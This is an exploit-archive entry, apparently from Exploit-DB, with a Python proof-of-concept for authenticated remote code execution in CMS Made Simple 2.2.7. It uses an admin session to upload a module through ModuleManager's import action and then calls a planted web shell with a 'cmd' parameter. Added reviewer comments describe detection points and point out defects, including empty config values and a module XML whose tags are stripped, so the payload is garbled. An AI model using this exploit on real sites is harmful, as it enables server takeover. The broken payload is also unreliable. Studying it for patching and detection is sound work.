CMS Made Simple 2.2.7 - (Authenticated) Remote Code Execution

Lucian Ioan Nitescu 2018-11-06 webapps php
# Exploit Title: CMS Made Simple 2.2.7 - Remote Code Execution
# Date: 2018-11-04
# Exploit Author: Lucian Ioan Nitescu
# Contact: https://twitter.com/LucianNitescu
# Website: https://nitesculucian.github.io
# Vendor Homepage: https://www.cmsmadesimple.org/
# Software Link: https://www.cmsmadesimple.org/downloads/cmsms/
# Version: 2.2.7
# Tested on: Ubuntu 18.04
# CVE: CVE-2018-10517

# 1. Description: 
# An attacker or a malicious user with access to the administration interface can execute code on the server.

# 2. Proof of Concept:

import requests

# Target configuration: this PoC requires admin credentials in order to obtain a valid
# session. Fill in the base URL and the name/value of the authenticated admin session cookie.
# NOTE(review): as shipped all three are empty strings, so burp0_url below becomes just
# "/admin/moduleinterface.php" with no host and the request cannot reproduce anything.

target_url=""
session_cookie = ""
session_value = ""

# Upload of a shell under the name of the Matomo module, via ModuleManager's local_import action.
# Defender note: the request to watch for is an authenticated POST to /admin/moduleinterface.php
# carrying mact=ModuleManager,m1_,local_import with a multipart file upload. Module import from
# the admin UI is the control point here: keep that admin permission to as few accounts as
# possible and review such requests in the web server access log.

burp0_url = target_url + "/admin/moduleinterface.php"

# The admin session is presented as a single cookie; key and value come from the config above.
burp0_cookies = {session_cookie: session_value}
# Headers replayed verbatim from an intercepting proxy. The Referer still points at the
# author's lab host and is not needed by the server; the multipart boundary in Content-Type
# must match the one used inside burp0_data byte for byte.
burp0_headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Referer": "http://gk1v1ml3nfrd1bs00o69fmwnh.public2.attackdefenselabs.com/", "Content-Type": "multipart/form-data; boundary=---------------------------207726338310671742711263591267", "Connection": "close", "Upgrade-Insecure-Requests": "1"}
# Raw multipart body with three fields: "mact" selects the ModuleManager local_import action,
# "__c" carries a hard-coded token that presumably has to match the admin session it was captured
# from (it will not be accepted for a different session — TODO confirm), and "m1_upload" is the
# module XML file ("test.xml"). NOTE(review): the XML as rendered here has lost its element tags
# in extraction — only text nodes (version numbers, "Matomo", file paths and 0/1 flags) survive —
# so this literal is not a well-formed module description and is unlikely to be accepted as-is.
burp0_data="-----------------------------207726338310671742711263591267\r\nContent-Disposition: form-data; name=\"mact\"\r\n\r\nModuleManager,m1_,local_import,0\r\n-----------------------------207726338310671742711263591267\r\nContent-Disposition: form-data; name=\"__c\"\r\n\r\n9a63802b6c4579cc01c\r\n-----------------------------207726338310671742711263591267\r\nContent-Disposition: form-data; name=\"m1_upload\"; filename=\"test.xml\"\r\nContent-Type: text/xml\r\n\r\n\n    1.3\n    Matomo\n    0.0.1\n    2.1.5\n    \n    \n    \n    \n      /\n      1\n    \n    \n      /action.admin_settings.php\n      0\n      \n    \n    \n      /action.admin_statistics.php\n      0\n      \n    \n    \n      /action.default.php\n      0\n      \n    \n    \n      /action.savesettings.php\n      0\n      \n    \n    \n      /lang/\n      1\n    \n    \n      /lang/en_US.php\n      0\n      \n    \n    \n      /Matomo.module.php\n      0\n      \n    \n    \n      /moduleinfo.ini\n      0\n      \n    \n    \n      /templates/\n      1\n    \n    \n      /templates/adminsettings.tpl\n      0\n      \n    \n\r\n-----------------------------207726338310671742711263591267--\r\n"
# Send the import request. The response object is discarded, so neither the HTTP status nor
# the server's reply is checked; success can only be judged by the follow-up URL below.
requests.post(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=burp0_data)

# Python 2 print statement (a SyntaxError under Python 3). Prints where the uploaded action file
# would be served from if the import went through; on a host suspected of compromise, an
# unexpected modules/Matomo/ directory under the web root is the artifact to look for.
print "Try to access your web shell at: " + target_url + "/modules/Matomo/action.admin_settings.php?cmd=ls%20-al"